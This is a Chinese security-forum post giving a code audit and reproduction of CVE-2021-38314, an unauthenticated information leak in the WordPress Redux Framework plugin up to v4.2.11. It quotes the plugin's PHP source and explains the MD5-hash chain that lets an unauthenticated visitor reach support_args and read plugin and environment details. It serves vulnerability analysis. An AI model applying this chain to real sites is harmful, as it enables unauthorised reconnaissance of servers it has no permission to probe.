问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Wordpress敏感信息泄漏漏洞 CVE-2021-38314 代码审计
漏洞分析
WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314 | 代码审计复现
WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314 | 代码审计复现 ================================================================================== 漏洞描述 ---- 2021年8月爆出Redux Framework存在未授权的敏感信息泄露漏洞,CVE编号为CVE-2021-38314,影响v4.2.11及以下版本,发送特定的请求包可以在未授权的情况下获取服务器敏感信息 漏洞影响 ---- Redux Framework <= v4.2.11 插件名 --- Redux Framework <https://github.com/reduxframework/redux-framework> 漏洞复现 ---- 影响范围为 v4.211 以下, 看一下版本间的更新差异 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0e83cbfcacce79ae68a52f280eda9091565682f.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0e83cbfcacce79ae68a52f280eda9091565682f.png) 这里将 add\_action 注册的函数都删除掉了,本地安装查看函数相关代码 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2b6df32d2b1ee4b9836fdd55209af6718db2aa9b.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2b6df32d2b1ee4b9836fdd55209af6718db2aa9b.png) ```php $support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' ); add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) ); add_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) ); $hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' ); add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) ); add_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) ); add_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) ); add_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) ); ``` 查看 add\_action 注册的函数 hash\_arg() 和 support\_args() ```php public static function hash_arg() { echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) ); die(); } ``` ```php public static function support_args() { header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' ); header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' ); header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' ); header( 'Cache-Control: no-store, no-cache, must-revalidate' ); header( 'Cache-Control: post-check=0, pre-check=0', false ); header( 'Pragma: no-cache' ); $instances = Redux::all_instances(); if ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification if ( is_array( $instances ) && ! empty( $instances ) ) { foreach ( $instances as $opt_name => $data ) { if ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification $array = $data; } } } if ( isset( $array ) ) { // We only want the extension names and versions. $array->extensions = self::get_extensions( $opt_name ); $to_return = array(); // Filter out all the unwanted data. foreach ( $array as $key => $value ) { if ( in_array( $key, array( // 'fields', 'extensions', 'sections', 'args', // 'field_types' ), true ) ) { $to_return[ $key ] = $value; } else { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement // phpcs:ignore Squiz.PHP.CommentedOutCode /* echo $key.PHP_EOL; */ } } $array = $to_return; } else { die(); } } else { $array = self::get_statistics_object(); if ( is_array( $instances ) && ! empty( $instances ) ) { $array['instances'] = array(); foreach ( $instances as $opt_name => $data ) { $array['instances'][] = $opt_name; } } $array['key'] = md5( Redux_Functions_Ex::hash_key() ); } ksort( $array ); // Let's make that pretty. // phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput echo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES ); die(); } ``` support\_args() 函数 $\_REQUEST\['i'\] 为空,来到另一处分支 ```php } else { $array = self::get_statistics_object(); if ( is_array( $instances ) && ! empty( $instances ) ) { $array['instances'] = array(); foreach ( $instances as $opt_name => $data ) { $array['instances'][] = $opt_name; } } $array['key'] = md5( Redux_Functions_Ex::hash_key() ); } ``` 跟踪 get\_statistics\_object() 函数,该函数可以获取 插件等环境变量 信息 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b82a54be4a24c84dc982ff13b8c3d13991425d46.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b82a54be4a24c84dc982ff13b8c3d13991425d46.png) 回过头可以看到该函数 为 wp\_ajax*nopriv*\* 可未授权调用 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b32945e773400971efaae18f8fc0c8f7afaaa023.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b32945e773400971efaae18f8fc0c8f7afaaa023.png) 其中需要变量 $support\_hash, 跟踪 hash\_key() 方法 ```php $support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' ); ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-358db193767b7fd663a0b09caa9f5589d6fb8bc6.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-358db193767b7fd663a0b09caa9f5589d6fb8bc6.png) wp-config.php 中存在 AUTH\_KEY 参数,为随机值 [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-caf89777a57c971be3b8fd15dcc76288821a1c57.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-caf89777a57c971be3b8fd15dcc76288821a1c57.png) 这里回到 hash\_arg() 函数[![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cc42f4b8bca2b56e4af44e80377ca241224da233.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-cc42f4b8bca2b56e4af44e80377ca241224da233.png) ```php public static function hash_arg() { echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) ); die(); } ``` 这里就调用到了 Redux\_Functions\_Ex::hash\_key() 中的函数,且返回 md5值 回到刚刚的代码中,可以发现得到的结果同样也是 $support\_hash 我们所需要知道的参数,下面为等价替换 ```php $support_hash = md5(hash_arg(). '-support' ); ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7b1f94c101500a779ce57a9761a0106fbdc95e52.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7b1f94c101500a779ce57a9761a0106fbdc95e52.png) 这样我们就获取到了一个利用链 ```php $hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' ); add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) ); | 获取 md5( Redux_Functions_Ex::hash_key() . '-redux') 值 | $support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' ); add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) ); | 调用函数 support_args 获取系统敏感信息 ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-39d9c5d623a42ab0d5b3897a4fd2d78e285d48c7.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-39d9c5d623a42ab0d5b3897a4fd2d78e285d48c7.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1abb7eaa3e3a808eaf7f3a0e0f63950c9186b216.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-1abb7eaa3e3a808eaf7f3a0e0f63950c9186b216.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bb4c083fd1c2b3252a43d20f993e77ab96d0ebb7.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bb4c083fd1c2b3252a43d20f993e77ab96d0ebb7.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e1f0264bb7c0db89a628bfb70b79fcb49784e67d.png)](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e1f0264bb7c0db89a628bfb70b79fcb49784e67d.png) 成功获取到了插件版本等有关信息
发表于 2021-12-03 09:51:54
阅读 ( 7047 )
分类:
代码审计
0 推荐
收藏
0 条评论
请先
登录
后评论
PeiQi
5 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!